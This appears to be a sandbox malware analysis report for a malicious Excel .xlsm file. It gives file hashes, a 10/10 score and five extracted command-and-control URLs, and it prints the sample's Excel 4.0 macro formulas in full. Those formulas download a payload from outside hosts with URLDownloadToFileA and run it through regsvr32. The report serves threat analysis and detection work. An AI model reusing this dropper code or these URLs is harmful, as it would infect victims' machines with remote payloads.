Overview

overview

10

Static

static

10

9860fe4bdf...6.xlsm

windows7-x64

10

9860fe4bdf...6.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9860fe4bdf857285fb9837102abf1ee9356eac61dbf7ac480f11fbbb6b587366

  • Size

    95KB

  • Sample

    241120-yqwp8ashjk

  • MD5

    e3ad7e39368f466482e4072cfddbf213

  • SHA1

    a8d5d7335ee7468fa88bfb6de2860f35e087e40f

  • SHA256

    9860fe4bdf857285fb9837102abf1ee9356eac61dbf7ac480f11fbbb6b587366

  • SHA512

    65669a5c6f14ff46ece1a944b2ea3b8eada6cbe0d9d617ea83bf949108c93b5a2b8ef5fa3b51764a634c06cea9c47285817a6f54e3004f2e05a00844bb6793fc

  • SSDEEP

    1536:N+nXm5MB5Dg8cVoioFh+fYFl69oXiZ5bcvJlqGiwIWx1BcVXzAyVZF:N43DsVhonV69o2bchgGaWBcpASF

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/

http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/

https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/

https://lucacerullo.com/wp-admin/sZ7Sw/

http://198.50.143.158/cgi-bin/PsABe8gznY/
Attributes
  • formulas

    =FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/","..\wo1.ocx",0,0) =IF('EFWFSFG'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://lucacerullo.com/wp-admin/sZ7Sw/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://198.50.143.158/cgi-bin/PsABe8gznY/","..\wo1.ocx",0,0)) =IF('EFWFSFG'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\wo1.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://gavalisangh.astravit.com/umar-rack/fyMw4DZw1JAB/
xlm40.dropper

http://spanish.swslawfirm.com/wp-admin/llSlMYOLL/
xlm40.dropper

https://wowssipworld.com/wp-snapshots/7EzFXGUC3p0ffli/
xlm40.dropper

https://lucacerullo.com/wp-admin/sZ7Sw/
xlm40.dropper

http://198.50.143.158/cgi-bin/PsABe8gznY/

Targets

    • Target

      9860fe4bdf857285fb9837102abf1ee9356eac61dbf7ac480f11fbbb6b587366

    • Size

      95KB

    • MD5

      e3ad7e39368f466482e4072cfddbf213

    • SHA1

      a8d5d7335ee7468fa88bfb6de2860f35e087e40f

    • SHA256

      9860fe4bdf857285fb9837102abf1ee9356eac61dbf7ac480f11fbbb6b587366

    • SHA512

      65669a5c6f14ff46ece1a944b2ea3b8eada6cbe0d9d617ea83bf949108c93b5a2b8ef5fa3b51764a634c06cea9c47285817a6f54e3004f2e05a00844bb6793fc

    • SSDEEP

      1536:N+nXm5MB5Dg8cVoioFh+fYFl69oXiZ5bcvJlqGiwIWx1BcVXzAyVZF:N43DsVhonV69o2bchgGaWBcpASF

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks